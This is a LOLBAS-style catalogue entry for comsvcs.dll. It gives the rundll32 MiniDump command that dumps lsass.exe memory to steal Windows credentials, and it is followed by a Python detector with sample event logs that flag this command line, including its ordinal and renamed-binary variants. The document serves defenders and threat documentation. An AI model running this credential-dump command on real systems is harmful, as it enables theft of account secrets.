---
Name: Comsvcs.dll
Description: COM+ Services
Author:
Created: '2019-08-30'
Commands:
  - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
    Description: Calls the MiniDump exported function of comsvcs.dll, which in turn calls MiniDumpWriteDump on the process ID given as the first argument and writes a full memory dump to the file named by the second argument.
    UseCase: Dump lsass.exe process memory to retrieve credentials.
    Category: Dump
    Privileges: SYSTEM
    MitreID: T1003
    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
    OperatingSystem: Windows
Full_Path:
  - Path: c:\windows\system32\comsvcs.dll
Code_Sample:
  - Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Detection:
  - IOC: rundll32.exe process creation with a command line referencing comsvcs.dll and MiniDump
  - IOC: rundll32.exe opening a handle to lsass.exe and writing a minidump file
Resources:
  - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Acknowledgement:
  - Person: modexp (modexp.wordpress.com)
    Handle:
---
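The entry above leaves detection to the reader. The following is an added example written for this page, not code from the LOLBAS project or from modexp: a small Python detector that runs over constructed process-creation events (Sysmon Event ID 1 / Security 4688 style records, built inline as dictionaries) and flags the comsvcs.dll MiniDump command line. It goes slightly beyond the entry by also matching the ordinal form (`comsvcs.dll, #24`, since MiniDump is export ordinal 24 in comsvcs.dll) and the comma-separated rundll32 syntax, and it resolves the target PID against a constructed process table to rate an lsass.exe target as critical. The event field names, the process table and all PIDs are assumptions for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# rundll32 accepts both "dll EntryPoint" and "dll,EntryPoint"; MiniDump can
# also be reached by its export ordinal (#24 in comsvcs.dll), so match both.
MINIDUMP_RE = re.compile(
    r"comsvcs(?:\.dll)?\s*,?\s*(?:minidump|#\s*24)\b", re.IGNORECASE
)
# The string rundll32 forwards to MiniDump has the shape: <pid> <output file> full
ARGS_RE = re.compile(r'"?\s*(\d+)\s+(.+?)\s+full\b', re.IGNORECASE)


@dataclass
class Finding:
    record_id: int
    image: str
    parent_image: str
    target_pid: int
    target_image: str
    dump_path: str
    severity: str


def parse_minidump_args(cmdline: str) -> Optional[Tuple[int, str]]:
    """Return (target_pid, dump_path) if the command line invokes comsvcs MiniDump."""
    m = MINIDUMP_RE.search(cmdline)
    if not m:
        return None
    # Only look at the argument string that follows the entry point.
    a = ARGS_RE.search(cmdline, m.end())
    if not a:
        return None
    return int(a.group(1)), a.group(2).strip('"')


def scan(events: List[Dict], process_table: Dict[int, str]) -> List[Finding]:
    """Flag every event whose command line dumps a process through comsvcs.dll.

    The image name is deliberately not used as a filter: a renamed copy of
    rundll32.exe still produces the same command line, so the match is made on
    the arguments and the image is only reported.
    """
    findings = []
    for ev in events:
        parsed = parse_minidump_args(ev["CommandLine"])
        if parsed is None:
            continue
        pid, dump_path = parsed
        target = process_table.get(pid, "<unknown>")
        # Any MiniDump via comsvcs.dll is abnormal; an lsass.exe target is credential theft.
        severity = "critical" if target.lower() == "lsass.exe" else "suspicious"
        findings.append(Finding(
            record_id=ev["RecordId"],
            image=ev["Image"],
            parent_image=ev["ParentImage"],
            target_pid=pid,
            target_image=target,
            dump_path=dump_path,
            severity=severity,
        ))
    return findings


# Constructed sample data (assumed PIDs and paths), not real telemetry.
PROCESS_TABLE = {616: "lsass.exe", 4032: "notepad.exe"}

SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'rundll32 C:\windows\system32\comsvcs.dll MiniDump "616 C:\Windows\Temp\dump.bin full"'},
    {"RecordId": 2, "Image": r"C:\Users\Public\r.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"r.exe comsvcs.dll, #24 4032 out.dmp full"},
    {"RecordId": 3, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"RecordId": 4, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll"},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS, PROCESS_TABLE):
        print(f"[{f.severity}] record {f.record_id}: {f.image} (parent {f.parent_image}) "
              f"dumped pid {f.target_pid} ({f.target_image}) to {f.dump_path}")
```

The two regular expressions are split on purpose: matching the entry point first and then searching for the argument string only after it keeps a PID embedded in the DLL path or in an unrelated argument from being mistaken for the target. Record 4, a bare comsvcs.dll load with no entry point, is not flagged, and record 2 shows that a renamed rundll32.exe is caught on the command line alone.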